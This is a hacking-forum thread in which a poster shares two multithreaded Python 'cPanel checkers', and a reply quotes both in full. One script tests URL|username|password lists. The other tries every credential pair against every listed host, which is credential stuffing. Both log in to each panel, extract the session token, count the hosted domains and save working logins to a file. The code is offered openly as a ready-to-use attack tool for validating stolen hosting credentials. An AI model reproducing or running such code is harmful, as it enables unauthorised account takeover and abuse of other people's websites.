Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 526

CPanel Checkers - 2 Variants - Python

by nakedpoet - 16 February, 2024 - 02:45 PM
This post is by a banned member (nakedpoet) - Unhide
nakedpoet  
Registered
23
Posts
7
Threads
2 Years of service
#1
text files of URL|USERNAME|PASSWORD formats
It will tell you how many domains are attached to each associated cPanel

 
Code:
 
import requests
import sys
import json
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import *

requests.urllib3.disable_warnings()
init(autoreset=True)

msg0 = "Coded By Cash_Out_Gang1337 - cPanel And Domain Checker\n"
for i in msg0:
    sys.stdout.write(i)
    sys.stdout.flush()
    time.sleep(0.02)

filename = input("Enter cPanel List: ")
urls = []

with open(filename, 'r', encoding="iso-8859-1") as f:
    for line in f:
        urls.append(line.strip().split('|'))

checked = 0
valid = 0
invalid = 0

def get_domain_count(url, username, password):
    global checked, valid, invalid
    data_user_pass = {
        "user": username,
        "pass": password
    }
    s = requests.Session()
    try:
        resp = s.post(f"{url}/login/?login_only=1", data=data_user_pass, timeout=20, allow_redirects=True)
        login_resp = json.loads(resp.text)
        time.sleep(0.05)  
        cpsess_token = login_resp["security_token"][7:]
        resp = s.post(f"{url}/cpsess{cpsess_token}/execute/DomainInfo/domains_data", data={"return_https_redirect_status":"1"})
        domains_data = json.loads(resp.text)
        total_domain = 1
        if domains_data["status"] == 1:
            total_domain += len(domains_data["data"]["sub_domains"])
            total_domain += len(domains_data["data"]["addon_domains"])
        print(Fore.GREEN + f"[GOOD CPANEL] --> {url} | Domains: {total_domain}")
        open(f"SuccescPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
        open(f"DomainNumberList.txt", "a", encoding="iso-8859-1").write(url + " --> Domains: " + str(total_domain) + "\n")
        valid += 1
    except Exception:
        print(Fore.RED + f"Bad! Login: {url}")
        invalid += 1
    finally:
        s.close()
        time.sleep(0.05)
        checked += 1

with ThreadPoolExecutor(max_workers=10) as executor:
    for url_info in urls:
        try:
            url, username, password = url_info
            executor.submit(get_domain_count, url, username, password)
        except ValueError:
            print("Error: Invalid URL format")
        except RequestException:
            print("Error: Request failed")
        except Exception as e:
            print(f"Error: {e}")
            
print(f"Checked: {checked} | Valid: {valid} | Invalid: {invalid}")

Now this second one will ask you for a URL List, and a Username:Password List
 
Code:
 
import requests, sys
import json
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import *
from itertools import product
requests.urllib3.disable_warnings()
init(autoreset=True)

print("Debug: Starting program...")

msg0 = "Coded By Cash_Out_Gang1337 - cPanel And Domain Checker\n"
for i in msg0:
    sys.stdout.write(i)
    sys.stdout.flush()
    time.sleep(0.02)


filename_urls = input("Enter URL List: ")
filename_user_pass = input("Enter User/Pass List: ")
urls = []
user_pass = []

print(f"Debug: Loading URLs from {filename_urls}...")
try:
    with open(filename_urls, 'r', encoding="iso-8859-1") as f:
        for line in f:
            urls.append(line.strip())
except Exception as e:
    print(f"Debug: Error loading URLs: {e}")

print(f"Debug: Loading user/pass from {filename_user_pass}...")
try:
    with open(filename_user_pass, 'r', encoding="iso-8859-1") as f:
        for line in f:
            user_pass.append(line.strip().split('|'))
except Exception as e:
    print(f"Debug: Error loading user/pass: {e}")

# Create all combinations of URLs and Username/Password
combinations = list(product(urls, user_pass))

def get_domain_count(url, username, password):
    data_user_pass = {
        "user": username,
        "pass": password
    }
    s = requests.Session()
    try:
        resp = s.post(f"{url}/login/?login_only=1", data=data_user_pass, timeout=20, allow_redirects=True)
        login_resp = json.loads(resp.text)
        time.sleep(0.05) 
        cpsess_token = login_resp["security_token"][7:]
        resp = s.post(f"{url}/cpsess{cpsess_token}/execute/DomainInfo/domains_data", data={"return_https_redirect_status":"1"})
        domains_data = json.loads(resp.text)
        total_domain = 1
        if domains_data["status"] == 1:
            total_domain += len(domains_data["data"]["sub_domains"])
            total_domain += len(domains_data["data"]["addon_domains"])
        print(Fore.GREEN + f"[GOOD CPANEL] --> {url} | Domains: {total_domain}")
        open(f"SuccescPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
        open(f"DomainNumberList.txt", "a", encoding="iso-8859-1").write(url + " --> Domains: " + str(total_domain) + "\n")
    except Exception:
        print(Fore.RED + f"Bad! Login: {url}")
        open(f"FailedcPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
    finally:
        s.close()
        time.sleep(0.05)

with ThreadPoolExecutor(max_workers=10) as executor:
    for combo in combinations:
        url, (username, password) = combo
        executor.submit(get_domain_count, url, username, password)
input("Press Enter to exit...")
This post is by a banned member (dodo68) - Unhide
This post is by a banned member (nerf76) - Unhide
nerf76  
Registered
152
Posts
0
Threads
1 Year of service
#3
(16 February, 2024 - 02:45 PM)nakedpoet Wrote: Show More
text files of URL|USERNAME|PASSWORD formats
It will tell you how many domains are attached to each associated cPanel

 
Code:
 
import requests
import sys
import json
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import *

requests.urllib3.disable_warnings()
init(autoreset=True)

msg0 = "Coded By Cash_Out_Gang1337 - cPanel And Domain Checker\n"
for i in msg0:
    sys.stdout.write(i)
    sys.stdout.flush()
    time.sleep(0.02)

filename = input("Enter cPanel List: ")
urls = []

with open(filename, 'r', encoding="iso-8859-1") as f:
    for line in f:
        urls.append(line.strip().split('|'))

checked = 0
valid = 0
invalid = 0

def get_domain_count(url, username, password):
    global checked, valid, invalid
    data_user_pass = {
        "user": username,
        "pass": password
    }
    s = requests.Session()
    try:
        resp = s.post(f"{url}/login/?login_only=1", data=data_user_pass, timeout=20, allow_redirects=True)
        login_resp = json.loads(resp.text)
        time.sleep(0.05)  
        cpsess_token = login_resp["security_token"][7:]
        resp = s.post(f"{url}/cpsess{cpsess_token}/execute/DomainInfo/domains_data", data={"return_https_redirect_status":"1"})
        domains_data = json.loads(resp.text)
        total_domain = 1
        if domains_data["status"] == 1:
            total_domain += len(domains_data["data"]["sub_domains"])
            total_domain += len(domains_data["data"]["addon_domains"])
        print(Fore.GREEN + f"[GOOD CPANEL] --> {url} | Domains: {total_domain}")
        open(f"SuccescPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
        open(f"DomainNumberList.txt", "a", encoding="iso-8859-1").write(url + " --> Domains: " + str(total_domain) + "\n")
        valid += 1
    except Exception:
        print(Fore.RED + f"Bad! Login: {url}")
        invalid += 1
    finally:
        s.close()
        time.sleep(0.05)
        checked += 1

with ThreadPoolExecutor(max_workers=10) as executor:
    for url_info in urls:
        try:
            url, username, password = url_info
            executor.submit(get_domain_count, url, username, password)
        except ValueError:
            print("Error: Invalid URL format")
        except RequestException:
            print("Error: Request failed")
        except Exception as e:
            print(f"Error: {e}")
            
print(f"Checked: {checked} | Valid: {valid} | Invalid: {invalid}")

Now this second one will ask you for a URL List, and a Username:Password List
 
Code:
 
import requests, sys
import json
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import *
from itertools import product
requests.urllib3.disable_warnings()
init(autoreset=True)

print("Debug: Starting program...")

msg0 = "Coded By Cash_Out_Gang1337 - cPanel And Domain Checker\n"
for i in msg0:
    sys.stdout.write(i)
    sys.stdout.flush()
    time.sleep(0.02)


filename_urls = input("Enter URL List: ")
filename_user_pass = input("Enter User/Pass List: ")
urls = []
user_pass = []

print(f"Debug: Loading URLs from {filename_urls}...")
try:
    with open(filename_urls, 'r', encoding="iso-8859-1") as f:
        for line in f:
            urls.append(line.strip())
except Exception as e:
    print(f"Debug: Error loading URLs: {e}")

print(f"Debug: Loading user/pass from {filename_user_pass}...")
try:
    with open(filename_user_pass, 'r', encoding="iso-8859-1") as f:
        for line in f:
            user_pass.append(line.strip().split('|'))
except Exception as e:
    print(f"Debug: Error loading user/pass: {e}")

# Create all combinations of URLs and Username/Password
combinations = list(product(urls, user_pass))

def get_domain_count(url, username, password):
    data_user_pass = {
        "user": username,
        "pass": password
    }
    s = requests.Session()
    try:
        resp = s.post(f"{url}/login/?login_only=1", data=data_user_pass, timeout=20, allow_redirects=True)
        login_resp = json.loads(resp.text)
        time.sleep(0.05) 
        cpsess_token = login_resp["security_token"][7:]
        resp = s.post(f"{url}/cpsess{cpsess_token}/execute/DomainInfo/domains_data", data={"return_https_redirect_status":"1"})
        domains_data = json.loads(resp.text)
        total_domain = 1
        if domains_data["status"] == 1:
            total_domain += len(domains_data["data"]["sub_domains"])
            total_domain += len(domains_data["data"]["addon_domains"])
        print(Fore.GREEN + f"[GOOD CPANEL] --> {url} | Domains: {total_domain}")
        open(f"SuccescPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
        open(f"DomainNumberList.txt", "a", encoding="iso-8859-1").write(url + " --> Domains: " + str(total_domain) + "\n")
    except Exception:
        print(Fore.RED + f"Bad! Login: {url}")
        open(f"FailedcPanels.log", "a").write(url + "|" + username + "|" + password + "\n")
    finally:
        s.close()
        time.sleep(0.05)

with ThreadPoolExecutor(max_workers=10) as executor:
    for combo in combinations:
        url, (username, password) = combo
        executor.submit(get_domain_count, url, username, password)
input("Press Enter to exit...")
jkljhklhjk

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)